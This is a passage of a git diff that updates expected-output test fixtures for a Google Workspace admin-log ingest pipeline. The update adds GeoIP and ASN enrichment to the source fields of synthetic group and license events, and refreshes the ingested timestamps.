"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "RELEASE_FROM_QUARANTINE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json index aac7bcf5b20..fc9d37d848b 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -45,8 +33,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717685400Z", + "ingested": "2021-12-14T14:44:38.692853941Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CREATE_GROUP", @@ -69,24 +78,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -119,8 +119,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717691200Z", + "ingested": "2021-12-14T14:44:38.692860136Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "DELETE_GROUP", @@ -143,24 +164,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -193,8 +205,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717697700Z", + "ingested": "2021-12-14T14:44:38.692861032Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_DESCRIPTION", @@ -218,6 +251,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -252,6 +288,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -261,7 +309,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717704Z", + "ingested": "2021-12-14T14:44:38.692861745Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_LIST_DOWNLOAD", @@ -284,18 +332,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -328,8 +364,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717708300Z", + "ingested": "2021-12-14T14:44:38.692862345Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_GROUP_MEMBER", @@ -353,24 +410,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -403,8 +451,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717712700Z", + "ingested": "2021-12-14T14:44:38.692862987Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_GROUP_MEMBER", @@ -428,24 +497,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -478,8 +538,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717717400Z", + "ingested": "2021-12-14T14:44:38.692863557Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER", @@ -503,24 +584,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -553,8 +625,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717721500Z", + "ingested": "2021-12-14T14:44:38.692864236Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", @@ -578,24 +671,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -628,8 +712,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717726100Z", + "ingested": "2021-12-14T14:44:38.692864882Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", @@ -653,6 +758,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -692,6 +800,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -701,7 +821,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717729800Z", + "ingested": "2021-12-14T14:44:38.692865499Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "GROUP_MEMBER_BULK_UPLOAD", @@ -752,6 +872,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -761,7 +893,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717734400Z", + "ingested": "2021-12-14T14:44:38.692866239Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_MEMBERS_DOWNLOAD", @@ -784,18 +916,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -828,8 +948,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717738700Z", + "ingested": "2021-12-14T14:44:38.692867240Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_NAME", @@ -853,24 +994,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -903,8 +1035,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717743800Z", + "ingested": "2021-12-14T14:44:38.692867893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_SETTING", @@ -928,6 +1081,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -971,6 +1127,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -980,7 +1148,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:43.717749700Z", + "ingested": "2021-12-14T14:44:38.692868608Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "WHITELISTED_GROUPS_UPDATED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json index c405f24e075..c35998b0e86 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-licenses.log-expected.json @@ -32,6 +32,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -41,7 +53,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984529200Z", + "ingested": "2021-12-14T14:44:41.268400229Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_USERS_LICENSE_ASSIGNMENT", @@ -94,6 +106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -103,7 +127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984540Z", + "ingested": "2021-12-14T14:44:41.268403213Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT", @@ -156,6 +180,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -165,7 +201,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984545800Z", + "ingested": "2021-12-14T14:44:41.268403670Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_ASSIGNMENT", @@ -218,6 +254,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -227,7 +275,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984551500Z", + "ingested": "2021-12-14T14:44:41.268404097Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "CHANGE_LICENSE_AUTO_ASSIGN", @@ -280,6 +328,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -289,7 +349,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984555500Z", + "ingested": "2021-12-14T14:44:41.268404481Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "USER_LICENSE_REASSIGNMENT", @@ -342,6 +402,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -351,7 +423,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984560400Z", + "ingested": "2021-12-14T14:44:41.268404876Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "provider": "admin", "action": "ORG_LICENSE_REVOKE", @@ -404,6 +476,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -413,7 +497,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:45.984565500Z", + "ingested": "2021-12-14T14:44:41.268405265Z", "original": 